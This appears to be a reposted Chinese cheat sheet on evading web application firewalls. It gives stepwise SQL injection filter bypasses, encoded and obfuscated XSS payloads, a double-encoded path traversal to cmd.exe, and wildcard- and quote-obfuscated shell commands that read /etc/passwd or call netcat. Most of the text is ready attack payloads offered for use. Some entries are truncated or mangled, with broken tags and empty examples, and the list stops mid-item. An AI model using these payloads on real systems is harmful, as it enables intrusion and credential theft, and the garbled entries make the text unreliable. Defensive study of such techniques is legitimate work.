原文:https://mp.weixin.qq.com/s/aeRi1lRnKcs_N2JLcZZ0Gg
0X00 Fuzz/爆破
fuzz字典
1.Seclists/Fuzzing
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
2.Fuzz-DB/Attack
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack
3.Other Payloads 可能会被ban ip,小心为妙。
https://github.com/foospidy/payloads
0X01 正则绕过
多少waf 使用正则匹配。
黑名单检测/bypass
Case: SQL 注入
• Step 1:
过滤关键词: and, or, union
可能正则: preg_match('/(and|or|union)/i', $id)
被拦截的语句: union select user, password from users
bypass语句: 1 || (select user from users where user_id = 1) = 'admin'• Step 2:
过滤关键词: and, or, union, where
被拦截的语句: 1 || (select user from users where user_id = 1) = 'admin'
bypass语句: 1 || (select user from users limit 1) = 'admin'• Step 3:
过滤关键词: and, or, union, where, limit
被拦截的语句: 1 || (select user from users limit 1) = 'admin'
bypass语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'• Step 4:
过滤关键词: and, or, union, where, limit, group by
被拦截的语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
bypass语句: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1• Step 5:
过滤关键词: and, or, union, where, limit, group by, select
被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
bypass语句: 1 || 1 = 1 into outfile 'result.txt'
bypass语句: 1 || substr(user,1,1) = 'a'• Step 6:
过滤关键词: and, or, union, where, limit, group by, select, '
被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
bypass语句: 1 || user_id is not null
bypass语句: 1 || substr(user,1,1) = 0x61
bypass语句: 1 || substr(user,1,1) = unhex(61)• Step 7:
过滤关键词: and, or, union, where, limit, group by, select, ', hex
被拦截的语句: 1 || substr(user,1,1) = unhex(61)
bypass语句: 1 || substr(user,1,1) = lower(conv(11,10,36))• Step 8:
过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr
被拦截的语句: 1 || substr(user,1,1) = lower(conv(11,10,36))
bypass语句: 1 || lpad(user,7,1)• Step 9:
过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr, white space
被拦截的语句: 1 || lpad(user,7,1)
bypass语句: 1%0b||%0blpad(user,7,1)
0X02 混淆/编码
1. 大小写
标准: <script>alert()script>
Bypassed: <ScRipT>alert()sCRipT>
标准: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'2. URL 编码
被阻断语句: 3. Unicode 编码
标准: 4. HTML 实体编码
标准: "><img src=x onerror=confirm()>
Encoded: "><img src=x onerror=confirm()> (General form)
Encoded: "><img src=x onerror=confirm()> (Numeric reference)5. 混合编码
Sometimes, WAF rules often tend to filter out a specific type of encoding.
This type of filters can be bypassed by mixed encoding payloads.
Tabs and newlines further add to obfuscation.混淆:
<A HREF="h
tt p://6 6.000146.0x7.147/">XSSA>7. 双重URL编码
这个需要服务端多次解析了url编码
标准: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\
标准: <script>alert()script>
混淆: %253Cscript%253Ealert()%253C%252Fscript%253E8. 通配符使用
用于linux命令语句注入,通过shell通配符绕过
标准: /bin/cat /etc/passwd
混淆: /???/??t /???/??ss??
Used chars: / ? t s
标准: /bin/nc 127.0.0.1 1337
混淆: /???/n? 2130706433 1337
Used chars: / ? n [0-9]9. 动态payload 生成
标准: <script>alert()script>
混淆: <script>eval('al'+'er'+'t()')script>
标准: /bin/cat /etc/passwd
混淆: /bi'n'''/c''at' /e'tc'/pa''ss'wd
Bash allows path concatenation for execution.
标准: